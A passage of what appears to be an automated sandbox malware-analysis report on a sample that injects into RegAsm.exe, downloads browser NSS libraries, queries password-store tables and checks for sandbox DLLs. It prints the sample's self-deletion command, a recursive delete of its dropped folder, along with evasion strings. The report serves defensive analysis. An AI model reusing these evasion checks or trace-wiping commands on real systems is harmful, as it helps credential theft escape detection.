                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.ini
                  Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                  Source: RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2534037920.0000000019228000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, sqls[1].dll.1.dr, nss3[1].dll.1.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
                  Source: RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2534037920.0000000019228000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, sqls[1].dll.1.dr, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2534037920.0000000019228000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, sqls[1].dll.1.dr, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2534037920.0000000019228000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, sqls[1].dll.1.dr, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
                  Source: RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2534037920.0000000019228000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.1.dr Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                  Source: RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2534037920.0000000019228000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                  Source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2534037920.0000000019228000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, sqls[1].dll.1.dr, nss3[1].dll.1.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                  Source: RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2534037920.0000000019228000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, sqls[1].dll.1.dr, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                  Source: RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2534037920.0000000019228000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.1.dr Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                  Source: BFCFBK.1.dr, KEGCBF.1.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2534037920.0000000019228000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.1.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                  Source: RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2534037920.0000000019228000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.1.dr Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                  Source: file.exe ReversingLabs: Detection: 42%
                  Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KECBFBAEBKJJ" & exit
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dbghelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dlnashext.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wpdshext.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                  Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                  Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                  Source: Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                  Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                  Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
                  Source: Binary string: nss3.pdb source: RegAsm.exe, 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                  Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2534037920.0000000019228000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.1.dr
                  Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                  Source: Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00417645
                  Source: softokn3.dll.1.drStatic PE information: section name: .00cfg
                  Source: softokn3[1].dll.1.drStatic PE information: section name: .00cfg
                  Source: freebl3.dll.1.drStatic PE information: section name: .00cfg
                  Source: freebl3[1].dll.1.drStatic PE information: section name: .00cfg
                  Source: mozglue.dll.1.drStatic PE information: section name: .00cfg
                  Source: mozglue[1].dll.1.drStatic PE information: section name: .00cfg
                  Source: msvcp140.dll.1.drStatic PE information: section name: .didat
                  Source: msvcp140[1].dll.1.drStatic PE information: section name: .didat
                  Source: sqls[1].dll.1.drStatic PE information: section name: .00cfg
                  Source: nss3.dll.1.drStatic PE information: section name: .00cfg
                  Source: nss3[1].dll.1.drStatic PE information: section name: .00cfg
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00384A56 push ecx; ret 0_2_00384A69
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004191D5 push ecx; ret 1_2_004191E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC6B536 push ecx; ret 1_2_6CC6B549
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KECBFBAEBKJJ\nss3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KECBFBAEBKJJ\msvcp140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqls[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KECBFBAEBKJJ\freebl3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KECBFBAEBKJJ\softokn3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KECBFBAEBKJJ\mozglue.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KECBFBAEBKJJ\vcruntime140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4784, type: MEMORYSTR
                  Source: RegAsm.exeBinary or memory string: DIR_WATCH.DLL
                  Source: RegAsm.exeBinary or memory string: SBIEDLL.DLL
                  Source: RegAsm.exeBinary or memory string: API_LOG.DLL
                  Source: RegAsm.exe, 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\KECBFBAEBKJJ\nss3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqls[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\KECBFBAEBKJJ\freebl3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\KECBFBAEBKJJ\softokn3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dllJump to dropped file
                  Source: C:\Windows\SysWOW64\timeout.exe TID: 3660Thread sleep count: 86 > 30Jump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040FCE5 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0040FDF8h1_2_0040FCE5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00394303 FindFirstFileExW,0_2_00394303
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,1_2_00401162
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_004162AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,1_2_004153F6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040B463
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_004094E5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040C679
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00415AC2
